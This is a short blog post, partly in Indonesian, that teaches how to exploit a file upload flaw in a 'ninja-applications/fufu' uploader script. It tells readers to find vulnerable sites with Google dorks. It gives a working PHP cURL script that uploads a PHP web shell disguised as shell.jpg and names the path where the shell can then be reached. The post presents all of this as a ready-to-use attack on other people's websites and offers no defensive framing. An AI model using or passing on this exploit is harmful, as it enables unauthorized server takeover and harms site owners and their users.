.png)
By 
6:55 AM
Google dorks : use your brain !
Vuln Code : {"jsonrpc" : "2.0", "result" : null, "id" : "id", "cleanFileName" : ""}
Victim : /ninja-applications/fufu/controllers/uploader/upload.php
Exploit Code :
<?php
$url = "http://localhost/ninja-applications/fufu/controllers/uploader/upload.php";
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Shell access : localhost/uploads/temp/fufu(random code)shell.php . ex: fufu55f9730a4ea30sh.php
Pertama, dorking dulu di google.
Lalu cek urlnya : http://localhost/ninja-applications/fufu/controllers/uploader/upload.php
Jika ada vuln code seperti di ss, berarti situs tersebut bisa dieksekusi.
Tinggal di exploit dengan exploit code php diatas. Gunakan xampp di Windows atau langsung di Linux.
Tinggal diakses shell nya sesuai nama yang tertera di terminal.
Mudah bukan ? Sekian tutor kali ini semoga bermanfaat. :)
0 comments